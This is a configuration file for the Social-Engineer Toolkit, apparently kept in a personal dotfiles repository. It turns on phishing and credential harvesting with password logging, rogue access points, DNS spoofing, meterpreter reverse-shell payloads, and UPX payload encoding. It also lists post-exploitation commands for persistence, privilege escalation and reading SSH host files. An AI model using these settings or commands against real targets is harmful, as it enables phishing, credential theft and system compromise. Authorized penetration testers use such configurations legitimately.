# /qompassai/dotfiles/.config/setoolkit/set.config
# Qompass AI SE Toolkit Config
# Copyright (C) 2025 Qompass AI, All rights reserved
#################################################
# References: https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/readme/User_Manual.pdf
ACCESS_POINT_SSID=linksys
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
AP_CHANNEL=9
APACHE_DIRECTORY=/var/www/html
APACHE_SERVER=ON
AUTO_DETECT=ON
AUTO_MIGRATE=OFF
AUTO_REDIRECT=ON
AUTOMATIC_LISTENER=ON
BLEEDING_EDGE=ON
CLEANUP_ENABLED_DEBUG=ON
CUSTOM_LINUX_OSX_PAYLOAD=ON
DEPLOY_BINARIES=YES
DEPLOY_OSX_LINUX_PAYLOADS=ON
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
DNS_SERVER=ON
DSNIFF=ON
EMAIL_PROVIDER=GMAIL
ENCOUNT=4
ENABLE_PERSISTENCE_OSX=ON
ETTERCAP=ON
ETTERCAP_INTERFACE=eth0
ETTERCAP_PATH=/usr/share/ettercap
HARVESTER_LOG=/var/www
HARVESTER_LOG_PASSWORDS=ON
HARVESTER_REDIRECT=ON
HARVESTER_URL=http://thisisasite
JAVA_ID_PARAM=Verified Trusted and Secure (VERIFIED)
JAVA_REPEATER=ON
JAVA_TIME=200
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts
LINUX_METERPRETER_MULTI_SCRIPT=ON
LINUX_PAYLOAD_DELIVERY=linux/x86/meterpreter/reverse_tcp
LINUX_REVERSE_PORT=8081
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
METERPRETER_MULTI_SCRIPT=ON
METASPLOIT_DATABASE=postgresql
METASPLOIT_IFRAME_PORT=8080
METASPLOIT_MODE=ON
METASPLOIT_PATH=/opt/metasploit/apps/pro/msf3
OSX_PAYLOAD_DELIVERY=osx/x86/shell_reverse_tcp
OSX_REVERSE_PORT=8080
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
POWERSHELL_INJECTION=ON
POWERSHELL_INJECT_PAYLOAD_X86=windows/meterpreter/reverse_https
POWERSHELL_MULTI_INJECTION=ON
POWERSHELL_MULTI_PORTS=21,22,25,53,443
POWERSHELL_VERBOSE=ON
SELF_SIGNED_CERT=ON
SENDMAIL=ON
SET_INTERACTIVE_SHELL=ON
SET_SHELL_STAGER=ON
STAGE_ENCODING=ON
TIME_DELAY_EMAIL=1
TRACK_EMAIL_ADDRESSES=ON
UNC_EMBED=ON
UPX_ENCODE=ON
UPX_PATH=/usr/bin/upx
USER_AGENT_STRING=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
WEB_PORT=80
WEB_PROFILER=ON
WEBATTACK_EMAIL=ON
WEBATTACK_SSL=ON
WEBJACKING_TIME=2000
WGET_DEEP=ON
